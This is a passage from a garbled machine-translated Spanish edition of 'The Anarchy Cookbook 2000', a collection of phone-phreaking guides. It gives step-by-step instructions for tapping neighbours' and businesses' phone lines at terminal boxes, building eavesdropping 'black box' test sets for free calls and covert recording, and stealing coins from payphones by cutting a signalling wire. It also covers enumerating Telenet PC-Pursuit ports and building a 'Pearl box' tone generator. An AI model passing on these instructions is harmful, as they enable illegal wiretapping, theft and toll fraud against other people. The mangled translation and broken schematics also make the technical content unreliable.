cuidado" o "pinza con cuidado - no en exceso". Etc) En la parte frontal del disco, usted debe encontrar dos terminales. Estos son para el conjunto de pruebas. (Si usted no tiene uno, la desesperación dont - Te voy a mostrar maneras de hacer la prueba de base establece más adelante en este artículo). Enganche el anillo (-) al borne de la 'r', y la punta de cable (+) a la otra. (Por cierto, una forma fácil para determinar la polaridad correcta es con un 1 ½ v LED. Toque a la pareja a largo plazo., Si no se enciende, cambie los polos hasta que lo haga. Cuando se ilumina, encontrar la más larga de la dos polos del LED: Esta va a estar en la punta del hilo (+) Detrás del disco es un cable en espiral hasta este debe tener dos pinzas de cocodrilo en él .. Es muy útil, porque usted no tiene que mantener la conexión y desconexión.. el fone (equipo de prueba) en sí, y los clips de los trabaja muy bien. En la caja de bornes, debe haber alrededor de 10 terminales de tornillo de cada lado. Siga los cables, y se puede ver que los pares de cables están activos. Enganchar los clips a la par de terminales , y ya está listo! Marque si desea, o simplemente escuchar (Si alguien está en la línea). Más tarde, yo te mostraré una manera de crear una verdadera "llave" que permitirá a la persona que marcar en su línea y recibir llamadas de manera normal, y se puede escuchar en todo el tiempo. Más sobre esto más tarde ... En las principales áreas de prefijo cabezas de puente, se puede ver los bucles locales, que

Page 105: 106652012 the Anarchy Cookbook 2000 Es

son dos pares de cables (cable de par = anillo + punta, una línea de fono) que están directamente conectados entre sí en la caja de bornes. Estos 'lazos barato "como se les llama, no funcionan tan bien como los ya existentes establecidos en el hardware de conmutación en la oficina de cambio. ( Intente escanear sus prefijos æ00xx de 99xx # 's.) Los lados de tono que se anuncian con el tono de bucle de 1008 Hz, y el lado de caída no dará la respuesta. La primera persona que debe marcar el "lado colgar', y el disco de otra persona el lado de tono, y el tono debe detenerse si usted tiene el bucle de la derecha.) Si usted quiere encontrar el número de la línea que usted es, usted puede tratar de descifrar el "puente de registro" (o lo que sea), que está en la puerta izquierda. Si eso no funciona, puede utilizar lo siguiente:

# ANI (Número de Identificación Automática)Se trata de un número de prueba Telco que informa a usted el número que está llamando (Es la misma entrecortada, 'Campana la voz de puta 'que se obtiene cuando se llega a un número de desconectados)Para el:

NPA 213 - Dial 1223NPA 408 - Dial 760NPA 914 - Dial 990

Estos son muy útiles cuando te ocupes de todo tipo de terminales de línea, las cajas de la casa, etc Ahora que hemos cabezas de puente con cable, que puede ir en ... (No se olvide de cerrar y bloquear la caja, después de todo ... ¿No quieren que la gente de GE y Telco loco, ahora, ¿verdad?)

"Puedo" - Cajas de distribución telefónicaBásicamente, dos tipos:1. Caja grande, plata rectangular en el extremo de cada calle.2. Negro, redondo, rectangular o algo en cada poste de teléfono.

Tipo 1 - (. El más bajo, una más grande en el poste de teléfono) Este es el caso que lleva el cable subterráneo desde el puente y lo ejecuta en el cable de un poste telefónico El cuadro es siempre en el poste más cercano a la cabeza de puente, donde la línea aparece. Busque el "Llame antes de excavar - cable subterráneo" pegatinas .. El cuadro de caso es articulada, así que si quieres subir el poste, se puede abrir sin problemas. Estos por lo general tienen 2 filas de conjuntos de terminales. Usted podría tratar de suplantar a un técnico de telecomunicaciones e informar el número como "nuevo activo" (dar un nombre falso y un informe falso, etc) no recomiendo esto, y es probable que no trabajo (casi de manera positiva no lo hará) , pero esto es básicamente lo que los linieros Telco hacer.)

Tipo 2 - Este es el repartidor en el grupo de casas alrededor del polo (generalmente 4 o 5 casas). Se usa como he mencionado antes. Los terminales (8 o menos) estará en 2 filas horizontales de los conjuntos. Los cables adicionales que sólo están 'colgados' son disposiciones para las líneas adicionales a las residencias (una línea adicional por casa, es por eso que la carga de locura para la línea # 3!) Si el la caja de su casa también, divertirse y líneas de swap con a tu prójimo! "Piggyback" ellos y causar estragos en el barrio (Es hora de espionaje ...) Una vez más, no recomiendo esto, y es difícil de hacerlo correctamente. Desplazando a la derecha a lo largo de ...

APARTAMENTO / negocio multi-LINE CAJAS DE DISTRIBUCIÓNEncontrado el exterior del edificio (con mayor frecuencia en el lado derecho, pero no siempre ... Sólo tienes que seguir el cable desde el poste de teléfono) o en el sótano. Tiene un terminal para todas las líneas en el edificio. Se usa como cualquier cuadro de la rescisión del contrato, como antes. Por lo general, dice 'Campana sistema o similar. Tiene un máximo de 20 terminales en él (usually.) los medios son motivos (se olvide de estos). Los cables vienen del cable a una fila (generalmente el izquierdo), con la otra fila de terminales para la otra fila de terminales para los pares de hilos de construcción fone. El anillo (-) de alambre suele ser el terminal superior si el conjunto de la fila (1 de 10 o más), y la punta esen la abrazadera / tornillo debajo de ella. Esto se puede revertir, pero el par de cables termina siempre uno-a-top-of-entre sí-, no en el de al lado. (No estoy seguro de

Page 106: 106652012 the Anarchy Cookbook 2000 Es

por qué el otro está ahí, probablemente como una disposición para las líneas adicionales) No lo utilice sin embargo, es por lo general a cerca de los otros terminales, y en mi experiencia se obtiene una conexión ruidosa.

Nota final: Casi todos los apartamentos, negocios, hotel o cualquier lugar donde haya más de 2 líneas de estas líneas de terminación de este método se utiliza la terminación. Si usted puede dominar este tipo, puede tener el control de muchas cosas ... Mire a su alrededor en su área para un edificio que utiliza este tipo, y la práctica de conectar a la línea, etc Como una ayuda adicional, esta es la básica "estándar" código de color para líneas múltiples terminales de cableado o / etc ...

Una sola línea: Rojo = anillo Verde = Consejo Amarillo = Tierra * * Conectado a la bobina del timbre en los teléfonos de timbre individuales y puente (Campana solamente) Por lo general, conectado a la verde (Consejo)

Anillo (-) = Rojo Blanco / Red Stripe Marrón Blanco / Naranja Rayas Negro / Amarillo RayaConsejo (+) = verde (a veces amarillo, véase más arriba). Blanco / Verde Banda Blanco / Azul Raya Azul Negro / blanco= Tierra Negro Amarillo

RESIDENCIA CAJA DE TERMINALESPequeño, gris (puede ser una goma (del Pacífico Teléfono) o de plástico duro (AT & T) se ocupan de vivienda que conecta el cable de par de la caja de separación (Ver tipo 2, más arriba) en el poste para el cableado de su casa. Sólo 2 (o 4 , los 2 principales terminales están conectados en paralelo con la misma línea) terminales, y es muy fácil de usar. Esto puede ser usado para agregar más líneas a su casa o añadir una línea externa fuera de la casa.

Equipos de pruebaBueno, ahora puedes considerarte un experto de menor importancia en los terminales y el cableado de la red telefónica local. Ahora se puede aplicar a cualquier cosa que quieres hacer .. Aquí hay otro elemento muy útil:

Cómo hacer una base de prueba-Set y cómo usarlo para hacer llamadas, escuchar o tocar en serio y grabar la actividad de la línea. Estos son los (generalmente) Fones conjunto naranja de mano utilizadas por los técnicos de Telco a las líneas de prueba. Para hacer una muy simple, podrá tomar cualquier Campana (O de otro tipo, pero yo recomiendo un buen Campana fone como una princesa o un trimline. GTE Fones flip funciona excelentemente, sin embargo ..) fone y siga las instrucciones de abajo.

Nota: Un mod 'cuadro negro' tipo de fone le permitirá aprovechar su línea, y con la taquilla, es como si no estuviera allí. Se pueden recibir llamadas y marcar, y usted puede estar escuchando todo el tiempo! Muy útil. Con el cuadro de fuera, que tiene un conjunto fone normal de la prueba.

Instrucciones:Un cuadro negro básico funciona bien, con buenos resultados. Quite la cubierta del fone para exponer el cuadro de red (Campana Tipo fones solamente). El terminal <RR> debería haber un cable verde va a (naranja o diferentes tonos, si - no importa, la misma cosa). Desconecte el cable y conectarlo a uno de los polos de un interruptor SPST. Conectar un trozo de alambre al otro polo del interruptor y conectarlo al terminal <RR>. Ahora tome un 10kohm ½ vatio un 10% y lo puso entre el anuncio de terminal <RR> la terminal <F>,

Page 107: 106652012 the Anarchy Cookbook 2000 Es

que debe tener un color azul y un cable blanco va a (diferente para marcación por tonos). Se debe tener este aspecto:

----- Cable azul ---------- <F> !---- Hilo blanco -----! ! Resistencia de 10K ! !- El cable verde - ---- <RR> ! ! SPST

Lo que esto hace, en efecto es mantener abierto el gancho de colgar / marcación por pulsos interruptor (F a RR bucle) mientras se mantiene la línea de alta con la resistencia. Esto da el efecto de tensión mismo que si el fone fue 'colgado', mientras que los 10k ohmios tiene el derecho de voltaje por encima del "descolgado" umbral (alrededor de 22 voltios o menos, en comparación con 15-17 o normal descolgado 48 voltios de lo normal "colgado"), dando la versión de prueba 2.

Otro diseño es similar a la del equipo de prueba 'tipo 1' (arriba), pero tiene algunas características adicionales:

Desde> ---------------- Consejo ------ <Para probarCocodriloClip> ---------------- Anillo ----- <teléfono ! ! x! ! ! o! ! --- x --- RRRRR! ! x! ! --- X! x ---- 0 ------!x = Interruptor SPSTo = Red LD 0 = LED verdeRRRRR = 1.8k ½ vatio xxxx = interruptor DPDT resistor

Cuando el interruptor unipolar en el encendido, el LED se ilumina, y el fone se activará. La luz verde debe estar encendido. Si no es así, cambie el DPST. Si aún así no es así, compruebe la polaridad de la línea y los LEDs. Con las dos luces encendidas, colgar el fono. Todos ellos deben estar fuera ahora. Ahora la vuelta al DPST y recoger el fone. El LED rojo debe estar encendido, pero el verde no debe. Si es así, algo anda mal con el circuito. Usted no conseguirá un tono de marcado, si todo es correcto. Al conectar a la línea con las pinzas de cocodrilo (suponiendo que haya puesto este circuito dentro de nuestro fone y han puesto pinzas de cocodrilo en el anillo y los cables de punta (como lo hicimos antes)) que debe tener el # 1 SPST en la posición de apagado . Esto reducirá en gran medida el ruido de estática involucrado en conectar a una línea. El LED rojo también se puede utilizar para comprobar si tiene la polaridad correcta. Con este fone usted tendrá la capacidad de escuchar en todas las actividades de la línea sonora, y la gente (los 'espías')pueden utilizar su fone como normal. Tenga en cuenta que los conjuntos de prueba # 1 y # 2 tienen verdaderas 'cajas negras', y se puede utilizar para llamadas gratuitas (ver un artículo sobre las cajas negras).

Versión de prueba Set 3 El uso de un trimline (o similar) teléfono, retire la base y corte el resto de los terminales del cable desconectado, excepto para el rojo (anillo -) y el verde (extremo +). Clips de soldadura de cocodrilo a la terminal. El propio alambre es 'oropel' envuelto en rayón, y no así la soldadura. Dentro de la terminal uno, quitar el enchufe de la luz (si lo tiene) e instalar un pequeño tobogán o el interruptor (micro-miniatura

Page 108: 106652012 the Anarchy Cookbook 2000 Es

de Radio Shack SPST funciona bien). Localizar la conexión del anillo y los cables de punta sobre la placa de circuito impreso cerca de donde el conector se encuentra en la parte inferior del auricular. (Los cables son a veces de color negro o la frente en lugar de rojo y verde, respectivamente). Cortar el papel de aluminio y correr 2 trozos de cable en el interruptor. En paralelo con el interruptor de añadir un condensador de 200 uf ¼ VDC (mylar, Mica Plateada, de cerámica, no un electrolítico). Cuando el interruptor está cerrado, el teléfono funciona normalmente. Con el interruptor en la otra posición, se puede escuchar sin ser oído.

Nota: Para reducir el ruido involucrados en la conexión de los clips a la línea, agregue un interruptor seleccionable 1000 ohmios de ½ vatio en serie con el cable de la punta. Darle la vuelta en el circuito cuando se conecta, y una vez en la línea, darle la vuelta otra vez. (O simplemente usar el interruptor de la "línea de desconexión 'de tipo como en el conjunto de prueba de tipo 2 (arriba)). Además, evite tocar las pinzas de cocodrilo a las piezas de metal u otros terminales, porque hace que la estática en la línea y aumenta las sospechas de la gente.

GRABACIÓNSi usted desea dejar constancia de cualquier actividad, el uso conjunto de pruebas 1 y 2 anteriores (para la grabación desatendida de toda la actividad de la línea), o cualquier prueba si usted va a estar ahí para controlar cuando se está marcando, hablar, etc Lugar una pastilla de bobina telefónica (recomiendo el Becoton T-5 bobina de TP o equivalente) en el conjunto de pruebas, y poner el tapón de TP en el micrófono. toma de cualquier grabadora de cinta estándar. Pulsa play, rec, y la pausa. Pausa alternativa cuando se desea grabar (no creo que nadie debería tener ninguna dificultad con esto en absoluto ...) Bueno, si usted todavía no puede hacer un equipo de prueba o que no tenga todas las partes, aún hay esperanza .

Métodos alternativos:1. Encontrar una prueba de la campana situada en un pozo o una cabeza de puente y

"tomar prestado indefinidamente" ...

2. Equipos de prueba se pueden adquirir en:Techni-Tool5 Apollo carreteraCaja 368Plymouth Reunión PA.,19462

Solicite catálogo # 28

Por lo general son $ 300 - $ 600, y se supone que han de marcar la capacidad de lunes a viernes, así como la marcación TT. También son de una calidad mucho más alta que los equipos de prueba estándar de la campana. Si desea obtener más información sobre los temas tratados aquí, le sugiero:

1. Seguir Campana camiones y linieros o técnicos y hacer preguntas sutiles. También tratamos de 611 (servicio de reparación) y hacer preguntas ..

2. Explora el área para cualquier Campana hardware, y experimentar con él. No trate de algo si no está seguro de lo que estás haciendo, porque no quiero causar problemas, ¿verdad?

95. Para sacar dinero de teléfonos públicos por la Jolly Roger

Ahora voy a compartir con ustedes mis experiencias con los teléfonos públicos. Va a descubrirque es posible conseguir el dinero desde un teléfono público con un mínimo de esfuerzo. Teoría: La mayoría de los teléfonos de pago utilizar cuatro cables para la transmisión de datos y códigos a la oficina central. Dos de ellos se utilizan para voz (generalmente de color rojo y verde), uno es un suelo, y el último se utiliza con los otros para la transmisión de códigos.Es con este último alambre que va a trabajar con. En el teléfono público que por lo general ha hecho esto, que era de color morado, pero lo más probable será otro color.

Page 109: 106652012 the Anarchy Cookbook 2000 Es

Lo que va a hacer es simplemente encontrar un teléfono público que se ha puesto de manifiesto los cables, por ejemplo,que uno de ellos puede ser desconectado y conectado a gusto sin temor de descubrimiento. Usted descubrirá que por lo general es una buena idea tener un poco de cinta eléctrica junto con usted y alguna herramienta para el corte de la cinta. A través de ensayo y error, se le desconecte un cable a la hora de inicio con los diferentes hilos de color verde y rojo. Usted quiere un tono de llamada durante esta operación. Lo que quieres es desconectar el cable de suministro de los códigos a la compañía telefónica para que el teléfono público no va a obtener el "ocupado" o el comando 'colgar'. Deje este cable desconectado cuando lo descubre. ¿Qué sucederá: En cualquier momento que alguien pone una cantidad de dinero en el teléfono público, el depósito no se registrará en la compañía telefónica y que se llevará a cabo en el "temporal" de la cámara de teléfono público. Entonces, (un día después o algo así) que acaba de llegar de nuevo al teléfono, vuelva a conectar el cable, y haga clic en el gancho de un par de veces y el teléfono se lo tira todo por la rampa. (Lo que pasa es que el código de la 'colgar' que el teléfono no estaba recibiendo por el cable se desconecte de repente se pone el código yvertederos de su "" temporal "lugar de almacenamiento.) Usted puede hacer una buena cantidad de dinero de esta manera, pero recuerde que un técnico va a pasar por cada par de veces se ha informado roto y repararlo, a fin de comprobar al menos una vez al día. Disfrutar y divertirse .. Muchos teléfonos que he hecho esto, y funciona bien con cada uno ..

96. Computer Based PBX por The Jolly Roger

Para obtener una mejor comprensión de lo que una puede hacer esta central, aquí hay algunos fundamentos básicos. El PBX moderna es un equipo combinado, dispositivo de almacenamiento masivo, y por supuesto un sistema de conmutación que pueda:

1. Elaborar los procedimientos detallados, facturación automatizada, para permitir la identificación y gestión de llamadas de larga distancia. [Jajaja]

2. Combine durante el día los circuitos de comunicación de voz de calidad en los canales de datos de banda ancha para el tiempo de la noche de alta velocidad de transferencia de datos.

3. Maneja el correo electrónico [incluyendo las notas de oficina].4. Combinar los canales de voz en un circuito conferencia de banda ancha de audio /

visual, con la capacidad de diapositivas Reenviar y captura, rotafolios, imágenes de cualquier tipo.

Tanto la capacidad interna y externa de llamada de la centralita debe ser considerado cuidadosamente, porque muchas de las operaciones de negocios ejecuta una proporción muy alta de la estación de marcación interna a la estación y un sistema de baja capacidad no se encargará de la carga de tráfico solicitado. Un factor crítico es el número de troncos y las instalaciones de las oficinas centrales que se utilizan para las conexiones externas. Otro es el número de uniones o [links] que conforman las rutas de acceso para llamadas internas. Para entender los servicios disponibles en un equipo PBX ejecución típica, es necesario introducir el tema de la conmutación por división de tiempo. En una red de conmutación por división de tiempo todas las conexiones se realizan a través de un bus común que se llama (por supuesto) un "tiempo de división de autobuses". Cada tronco línea que requiere una conexión con otro está provisto de un circuito de puerto. Todos los circuitos de puerto tienen acceso al bus de división en el tiempo a través de un conmutador por división de tiempo. [Cuando dos puertos requieren conexión, sus interruptores de la división del tiempo operan a una frecuencia muy alta (16.000 veces por segundo). Esta técnica, que se llama "muestreo de voz", permite muchas conexiones simultáneas a través del bus por división de tiempo iguales. Cada conexión se le asigna un intervalo de tiempo, la "ranura de tiempo", y el número de ranuras de tiempo identifica el número de conexiones simultáneas entre los puertos.] El elemento crítico siguiente es paquetes de circuitos. Los elementos del sistema que se describen en futuros tutoriales [líneas o troncales y conmutadores, memoria y control] se encuentran en el enchufe de paquetes de circuitos. Cada paquete de circuito de línea contiene un número de líneas, en el ejemplo, cuatro. Sin embargo, la asignación de los números reales a la estación de los circuitos de la línea telefónica

Page 110: 106652012 the Anarchy Cookbook 2000 Es

es flexible. La memoria del sistema está contenida en paquetes de circuitos que proporcionan las funciones de procesamiento de llamadas. Los paquetes de circuitos se llevan a cabo en los marcos pequeños llamados "portadores". Dentro de cada compañía, los paquetes de circuitos están conectados en las posiciones: las de las franjas horarias ". Cada circuito puede ser abordado por, digamos, un número de cinco dígitos que le dice a su ubicación por el portador de la ranura de circuito .... [? Empezando a tener la idea] No puede haber tres tipos de operadores en un sistema PBX moderna:

• O las compañías de línea• 0 portadores del tronco• O de control de los transportistas

Los portadores de la línea contienen las líneas de la estación. En AT & T "dimensión" del modelo, por ejemplo, un total de 52 a 64 líneas se proporcionan. Los portadores tronco contienen ranuras para 16 paquetes de circuitos troncales. La compañía de control incluye procesador, memoria, circuitos de control, canales de datos para el control de consola de operadora y los resultados de medición de tráfico. Sistemas PBX directamente a reflejar los tipos de servicios que se ofrecen en la cooperación

o CCSA o ICC picturephones o [antes de lo que creo que mis phriends]

Un sistema común de control de conmutación (CCSA) permitir a cualquier central telefónica sin restricciones para llamar a cualquier estación de otro sistema interno o externo, mediante el uso de la norma número de siete dígitos. Enrutamiento alternativo es una característica de CCSA servicio de las instalaciones inter-, se alternan las rutas de llamadas enrutadas se llevan a cabo a nivel de la compañía central, no en el nivel central. Un sistema de interés para los grandes usuarios de telefonía escala es común entre oficinas del canal de señalización ICC. Por lo general, esta técnica emplea los canales comunes para llevar a todas las instalaciones de señalización entre las instrucciones: legumbres dial, en el gancho (en reposo), el auricular descolgado (ocupado), y así sucesivamente, entre dos centros de conmutación. [Entrar en calor]. ICC sustituye a los antiguos métodos de señalización entre centrales como "en la banda" y "fuera de banda 'técnicas. Por cierto, phreaks reales están vendiendo sus cuadros a los idiotas que todavía piensan que valen mucho ... el primero (en la banda) transmite señales de datos en el ancho de banda de una conversación normal. ITAES inconveniente es que la información falsa se puede transmitir debido a un tono único o combinado de ruido establecidos en la ruta de conversación. [Este es el razonamiento oficial]. Fuera de banda técnicas de señalización colocados los datos entre oficinas en los canales especiales, generalmente adyacentes a, e inmediatamente por encima del camino de voz. Para preservar la integridad entre canales, de la señalización de banda requiere filtrado muy eficaces o la separación "guardia de banda mayor entre los canales.

97. PC-Pursuit Puerto Estadísticas de Usuarios Pursuit en PC

Introducción:Los últimos 30 días de PC-Pursuit han sido muy controvertidos. Los usuarios y ex usuarios han exigido estadísticas precisas, y Telenet nos ha dado muy poco. Y los datos que se proporcionó es cuestionable. Bueno, aquí está la información que se garantiza que sea exacta y que grito Telenet. Si desea actualizar estos datos por su cuenta, nosotros le diremos cómo más adelante en este texto. La siguiente tabla se compone de todas las direcciones directas Telenet de los nodos de la ciudad Pursuit en PC y el número total de los módems en cada nodo. Esto es lo que significan los datos:

NJNEW / 3 2011 0.12 56 ! ! ! ! \ - Número total de Módems en NJNEW ! ! ! \ - Sufijo de Trabajo de última de la secuencia de direcciones. ! ! \ - Prefijo directa Dirección Telenet. ! \ --- Velocidad de transmisión de este puerto es 300. \ --------- Mnemonic.

Page 111: 106652012 the Anarchy Cookbook 2000 Es

Tenga en cuenta que hay varias maneras perfectamente legales para conectarse a un puerto PC-Pursuit como NJNEW / 3:

Formas de conectarse a NJNEW / 3:1. C D/NJNEW/3, PCP10000, <contraseña> [HUNT]2. C 2011, PCP10000, <contraseña> [HUNT]3. C 2.011,10, PCP10000, <contraseña> [CAZA NO] La primera, se explica por sí. El segundo hace lo mismo que el primero, sólo que es un poco más rápido y ofrece al usuario una flexibilidad mucho mayor. El tercero es un ejemplo de la flexibilidad, porque se hace una petición para conectarse a la décima, y sólo el módem décimo, en el NJNEW / puerto 3. Simplemente intenta conectarse a cada solo módem en la cadena de 2011, hemos sido capaces de contar el número de módems en cada puerto y llegar a los siguientes cuadros que fueron extraídos de junio la novena veinte del año 1989:

Giratorio Puerto Dirección directa Max. Serie Total de la ciudad Giratorio Puerto Dirección directa Max. Serie Total de la ciudadNJNEW / 3 2011 0.12 56 CAOAK / 3 4155 0.4 16 / 12 201301 0.4 / 12 415216 0.8 / 24 20122 0.4 / 24 41511 0.4DCWAS / 3 202115 0.6 46 CAPAL / 3 415106 0.4 12 / 12 202116 0.24 / 12 415224 0.8 / 24 202117 0.16 / 24 NINGUNO NINGUNOCTHAR / 3 NINGUNO NINGUNO 8 CASFA / 3 415215 0.6 20 / 12 203120 0.8 / 12 415217 0.10 / 24 NINGUNO NINGUNO / 24 41523 0.4WASEA / 3 20617 0.4 30 ORPOR / 3 50320 0.2 8 / 12 20619 0.22 / 12 50321 0.6 / 24 20621 0.4 / 24 NINGUNO NINGUNONYNYO / 3 212315 0.4 22 AZPHO / 3 60222 0.4 20 / 12 212316 0.14 / 12 60223 0.12 / 24 21228 0.4 / 24 60226 0.4CALAN / 3 213412 0.8 40 MNMIN / 3 612120 0.4 22 / 12 213413 0.28 / 12 612121 0.14 / 24 21323 0.4 / 24 61222 0.4TXDAL / 3 214117 0.6 30 MABOS / 3 617311 0.4 32 / 12 214118 0.22 / 12 617313 0.20 / 24 21422 0.4 / 24 61726 0.8PAPHI / 3 215112 0.6 36 TXHOU / 3 713113 0.8 42 / 12 2155 0.22 / 12 713114 0.24 / 24 21522 0.8 / 24 71324 0.1OHCLE / 3 21620 0.4 26 CACOL / 3 71423 0.4 18 / 12 21621 0.18 / 12 7144 0.1 / 24 216120 0.4 / 24 71424 0.4CODEN / 3 303114 0.4 40 CASAN / 3 714119 0.4 20 / 12 303115 0.18 / 12 714213 0.12 / 24 30321 0.22 / 24 714124 0.4FLMIA / 3 305120 0.6 28 CASDI / 3 714102 0.4 22 / 12 305121 0.18 (619) / 12714210 0.14 / 24 305122 0.4 / 24 714121 0.4Ilchi / 3 312410 0.8 40 UTSLC / 3 80120 0.4 22 / 12 312411 0.28 / 12 80121 0.14 / 24 31224 0.4 / 24 80112 0.4MIDET / 3 313214 0.6 30 FLTAM / 3 81320 0.4 18 / 12 313216 0.18 / 12 81321 0.1 / 24 31324 0.6 / 24 813124 0.4MOSLO / 3 3145 0.4 16 MOKCI / 3 816104 0.4 20 / 12 314421 0.8 / 12 816221 0.12 / 24 31420 0.4 / 24 816113 0.4GAATL / 3 404113 0.8 32 Cagle / 3 NINGUNO NINGUNO ? / 12 404114 0.20 / 12 81821 0.18 / 24 40422 0.4 / 24 NINGUNO NINGUNO

Page 112: 106652012 the Anarchy Cookbook 2000 Es

CASJO / 3 408111 0.4 34 CASAC / 3 9167 0.4 16 / 12 40821 0.26 / 12 91611 0.8 / 24 408110 0.4 / 24 91612 0.4WIMIL / 3 41420 0.4 24 NCRTP / 3 91920 0.4 20 / 12 41421 0.16 / 12 91921 0.12 / 24 414120 0.4 / 24 919124 0.4

NOTA: CASAC / 3, CASAC/24 fueron estimados.

Pursuit en PC Módems Tabla de EstadísticasEl número de módems - 01/29/89

Mnemotécnico300 1200 2400 TotalNJNEW 12 40 4 56DCWAS 6 24 16 46CTHAR 0 8 0 8WASEA 4 22 4 30NYNYO 4 14 4 22CALAN 8 28 4 40TXDAL 6 22 4 32PAPHI 6 22 8 36OHCLE 4 18 4 26CODEN 4 18 22 44FLMIA 6 18 4 28Ilchi 8 28 4 40MIDET 6 18 6 30MOSLO 4 8 4 16GAATL 8 20 4 32CASJO 4 26 4 34WIMIL 4 16 4 24CAOAK 4 8 4 16APAL 4 8 0 12CASFA 6 10 4 20ORPOR 2 6 0 8AZPHO 4 12 4 20MNMIN 4 14 4 22MABOS 4 20 8 32TXHOU 8 24 10 42CACOL 4 10 4 18CASAN 4 12 4 20CASDI 4 14 4 22UTSLC 4 14 4 22FLTAM 4 10 4 18MOKCI 4 12 4 20Cagle 4 18 4 26CASAC 4 8 4 16NCRTP 4 12 4 20Total 166 562 170 898Promedio 4.8823529 16 ½ 29412 5 26.411765 Creo que, básicamente, las estadísticas hablan por sí mismos. Estoy seguro de que será sin duda cientos de personas que no sonríen en el número de clases específicas de puertos compatibles, por no mencionar el número de módems 'muertos' o 'abajo' se encuentra al verificar los totales. Por lo general, un 2% a tal vez 10% de los módems son 'muertos' con los específicos en repetidas ocasiones su defecto, semana tras semana.

La historia de esta colección:Hace casi un año un pequeño grupo selecto de individuos devotos se reunieron para discutir los problemas con la red de PC-Pursuit, en el centro de nuestras discusiones se hizo una pregunta en cuanto a cómo la red realmente los procesos de nuestras llamadas. Esto fue pensada para ayudarnos a evaluar los comandos SET y otros asuntos similares. Cuando la hipótesis de la dirección se le ofreció que rápidamente se puso a probarlo. Se comprobó en aproximadamente 3 minutos con el descubrimiento de 2011

Page 113: 106652012 the Anarchy Cookbook 2000 Es

(primer intento fue xxx1). Los datos han sido continuamente recogidos y analizados desde entonces, pero hasta ahora, nunca ha sido puesto en libertad en masa. Un pequeño grupo de hackers adolescentes de edad descubrió varias cosas interesantes que se pueden hacer con estas direcciones - muchos de los cuales no se discuten aquí a mencionar que estos puertos conectados a través de estas direcciones no se limitan a PC-Pursuiters. Puede, sin embargo, luchar contra la "muertos" los módems de Marcado en las ciudades a través del método de dirección. Módems de muertos puede ser localizado en unos 10 segundos más rápido que Telenet), y puede ser reportado o se saltan pasado por el usuario que se conecta al módem siguiente en la secuencia después de que el "muerto" uno. (Nota: Diga 2011.3 está muerto, conectarse a 2.011,4 y usted será pasado 2.011,4 Si está ocupado, vaya hasta el 2011 ½ El lector debe notar 2011.3 es el mismo que 2011C...) El valor más interesante de estas direcciones es que uno puede contar el número de puertos que Telenet mantiene tan en secreto (Grin). Cuando sólo había 28 ciudades en la operación hubo un promedio de 2.7 300 baudios, baudios 9.4 1200, y 2 ½ 2400 baudios módems en cada ciudad. Algunas ciudades tuvieron tan poco como 2 módems en un puerto y hasta el 12. Sólo recientemente el número de módems por la ciudad comenzaron a saltar. ¿Cómo actualizar la cuenta de usted mismo:Un ID no está obligado a "solicitar" uno de estos puertos, por lo que el cómputo puede realizarse en cualquier momento del día con sólo escribir el número en el símbolo @. Aquí hay un ejemplo con cuatro módems (NJNEW/24):

@ 20.122,1 201 22A NO QUISO COBRAR LA CONEXIÓN 19 80 @ 20.122,2 201 22B NO QUISO COBRAR LA CONEXIÓN 19 80 @ 20.122,3 201 22C NO QUISO COBRAR LA CONEXIÓN 19 80 @ 20.122,4 201 22D QUISO COBRAR LA CONEXIÓN 19 80 @ 20122 ½ 201 Dirección 22E ILEGAL 19 80

El lector debe ser consciente de que la búsqueda en PC los puertos siempre responde con '19 80 '. No se debe confundir con el '19 00 ', que no son Pursuit en PC los puertos. En el ejemplo anterior, sabemos que hay cuatro puertos, porque el cuarto era el puerto existente última antes de que nos encontramos la "Dirección ilegal". Hay varias maneras para significar que usted ha ido más allá del final uno de los puertos:

1. xxx xxx ILEGAL DIRECCIÓN 19 802. xxx xxx NO FUNCIONA 19 803. La solicitud se congela. (Nota: Emitir una PAUSA entonces <C/R> D para

abortar el intento de obtención de "intento abortado")

Usted debe ser consciente de que los módems que están fuera de orden en la mitad de la secuencia se puede responder con "NO FUNCIONA" o se puede congelar la solicitud. También debe tener en cuenta que cuando se actualiza la lista existente, todo lo que necesita hacer es tratar de pedir el módem al lado más allá del final a partir de la última comprobación. Encontrar Puertos se añade:Muchos puertos todavía no se han instalado, por lo que todavía no conoce las direcciones. Nuevos puertos se pueden encontrar mediante la introducción de los primeros tres dígitos del código de área y añadiendo (1-29, 101-129, 201-229, 301-329, etc) hasta que el 'NO QUISO COBRAR LA CONEXIÓN 19 80' aparece. Una vez que este se encuentra, simplemente ingrese la dirección del puerto con su nombre y el R / V marcar algunas series de dígitos tonta, desconecte el puerto, a continuación, conectar con la tecla de acceso PC-Pursuit que creo que puede ser y el R / V volver a marcar el último número . Si los números coinciden, se le encontró.

Page 114: 106652012 the Anarchy Cookbook 2000 Es

98. Caja Perla planes del Jolly Roger

La Perla Caja: Definición - Este es un cuadro que puede sustituir a muchas cajas que producen tonos en hertz. La caja de perlas de cuando funciona correctamente puede producir tonos de 1-9999Hz. Como puede ver, 2600, 1633, 1336 y otros tonos fundamentales son, obviamente, en su espectro de sonido.

Materiales que necesitará:

1. C1, C2: ½ ½ uf mf o condensadores de disco de cerámica2. Q1 ..... transistor NPN (2N2222 funciona mejor)3. S1 ..... Normalmente abierto interruptor SPST momentáneo4. S2 ..... SPST interruptor de palanca5. B1 ..... estándar de 9 voltios de la batería6. R1 ..... una sola vuelta, potenciómetro de 50k7. R2 ..... una sola vuelta el potenciómetro, 100k8. R3 ..... una sola vuelta, potenciómetro de 500k9. R4 ..... una sola vuelta el potenciómetro, 1Meg10. SPKR ... Norma altavoz de 8 ohmios11. T1 ..... Mini transformador (de 8 ohmios que funciona mejor)12. Otros ... de alambre, soldador, soldadura, placa de circuito impreso o perfboard,

caja que contiene la unidad terminada, clip de la batería

Instrucciones para la construcción de Perla Caja:Dado que la instrucción son muy difíciles de explicar con palabras, se le dará un esquema en su lugar. Será muy difícil de seguir pero trate de cualquier manera.

(Esquema para la Perla El recuadro)+ --- + ------------ + --------- + ! ! \ C1 C2 \ ! ! + + + ----- + T1 ! \ + ------------ + - + ! b c -------! + ! Q1! +-S1- ! ----- e --- + S2! SPKR ! ! ! + ---- ! B1! ! ! ! ! + ------- + ! R1 R2 R3 R4! / \ / \ / \ / \ / \ / \ / \ / \ + - + + - + + - +

Ahora que es probable que esté completamente confundido, permítanme explicar algunos detalles sin importancia. El área potenciómetro está manipulado de modo que el poste izquierdo está conectado al polo central del potenciómetro junto a él. El terminal del medio de T1 está conectado a la pieza de alambre que corre hacia abajo hasta el final de la batería.

